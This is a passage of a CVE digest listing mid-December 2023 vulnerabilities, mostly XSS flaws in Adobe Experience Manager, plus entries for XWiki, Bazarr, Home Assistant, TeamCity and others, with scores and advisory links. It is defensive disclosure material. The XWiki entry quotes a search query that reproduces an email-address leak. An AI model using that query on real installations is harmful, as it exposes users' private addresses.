Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48598

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:48

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48598
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48599

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48599
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48600

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:17:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48600
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48601

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:17:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48601
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48602

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:20

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48602
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48603

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48603
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48604

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48604
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48605

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48605
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48606

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48606
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48607

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:18:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48607
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48609

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48609
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48610

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48610
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48611

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48611
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48612

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:21:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48612
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48613

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48613
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48614

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48614
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48615

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48615
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48616

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48616
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48617

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48617
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48618

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48618
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48619

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48619
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48620

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:23:12

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48620
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48621

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:23:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48621
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48622

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:29

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48622
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48623

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48623
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48624

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48624
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48441

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction.

CVE ID : CVE-2023-48441
Source : psirt@adobe.com
CVSS Score : 5.3

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-284

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Source : github.com

Vulnerability ID : CVE-2023-50728

First published on : 15-12-2023 22:15:07
Last modified on : 18-12-2023 14:05:33

Description :
octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3.

CVE ID : CVE-2023-50728
Source : security-advisories@github.com
CVSS Score : 5.4

References :
https://github.com/octokit/app.js/releases/tag/v14.0.2 | source : security-advisories@github.com
https://github.com/octokit/octokit.js/releases/tag/v3.1.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v10.9.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v11.1.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v12.0.4 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v9.26.3 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/security/advisories/GHSA-pwfr-8pq7-x9qv | source : security-advisories@github.com
https://github.com/probot/probot/releases/tag/v12.3.3 | source : security-advisories@github.com

Vulnerability : CWE-755


Vulnerability ID : CVE-2023-50720

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.

CVE ID : CVE-2023-50720
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/xwiki/xwiki-platform/commit/3e5272f2ef0dff06a8f4db10afd1949b2f9e6eea | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2grh-gr37-2283 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-20371 | source : security-advisories@github.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50266

First published on : 15-12-2023 21:15:09
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.

CVE ID : CVE-2023-50266
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-50715

First published on : 15-12-2023 03:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.

CVE ID : CVE-2023-50715
Source : security-advisories@github.com
CVSS Score : 4.3

References :
https://github.com/home-assistant/core/commit/dbfc5ea8f96bde6cd165892f5a6a6f9a65731c76 | source : security-advisories@github.com
https://github.com/home-assistant/core/security/advisories/GHSA-jqpc-rc7g-vf83 | source : security-advisories@github.com

Vulnerability : CWE-200


Source : mitre.org

Vulnerability ID : CVE-2021-42794

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.

CVE ID : CVE-2021-42794
Source : cve@mitre.org
CVSS Score : 5.3

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org
https://www.exploit-db.com/docs/english/17254-connection-string-parameter-pollution-attacks.pdf | source : cve@mitre.org


Source : emc.com

Vulnerability ID : CVE-2023-28053

First published on : 18-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:17

Description :
Dell NetWorker Virtual Edition versions 19.8 and below contain the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure.

CVE ID : CVE-2023-28053
Source : security_alert@emc.com
CVSS Score : 5.3

References :
https://www.dell.com/support/kbdoc/en-us/000220547/dsa-2023-358-security-update-for-dell-networker-virtual-edition-ssh-cryptographic-vulnerabilities | source : security_alert@emc.com

Vulnerability : CWE-327


Source : microsoft.com

Vulnerability ID : CVE-2023-36878

First published on : 15-12-2023 01:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE ID : CVE-2023-36878
Source : secure@microsoft.com
CVSS Score : 4.3

References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36878 | source : secure@microsoft.com


Source : jetbrains.com

Vulnerability ID : CVE-2023-50870

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible

CVE ID : CVE-2023-50870
Source : cve@jetbrains.com
CVSS Score : 4.3

References :
https://www.jetbrains.com/privacy-security/issues-fixed/ | source : cve@jetbrains.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-50871

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed

CVE ID : CVE-2023-50871
Source : cve@jetbrains.com
CVSS Score : 4.3

References :
https://www.jetbrains.com/privacy-security/issues-fixed/ | source : cve@jetbrains.com

Vulnerability : CWE-285


Source : netapp.com

Vulnerability ID : CVE-2023-27317

First published on : 15-12-2023 23:15:07
Last modified on : 18-12-2023 14:05:33

Description :
ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.

CVE ID : CVE-2023-27317
Source : security-alert@netapp.com
CVSS Score : 4.3

References :
https://security.netapp.com/advisory/NTAP-20231215-0001/ | source : security-alert@netapp.com

Vulnerability : CWE-200


(8) LOW VULNERABILITIES [0.1, 3.9]

Source : zabbix.com

Vulnerability ID : CVE-2023-32726

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
The vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server.

CVE ID : CVE-2023-32726
Source : security@zabbix.com
CVSS Score : 3.9

References :
https://support.zabbix.com/browse/ZBX-23855 | source : security@zabbix.com

Vulnerability : CWE-754


Source : adobe.com

Vulnerability ID : CVE-2023-48608

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:18:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.

CVE ID : CVE-2023-48608
Source : psirt@adobe.com
CVSS Score : 3.5

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-20

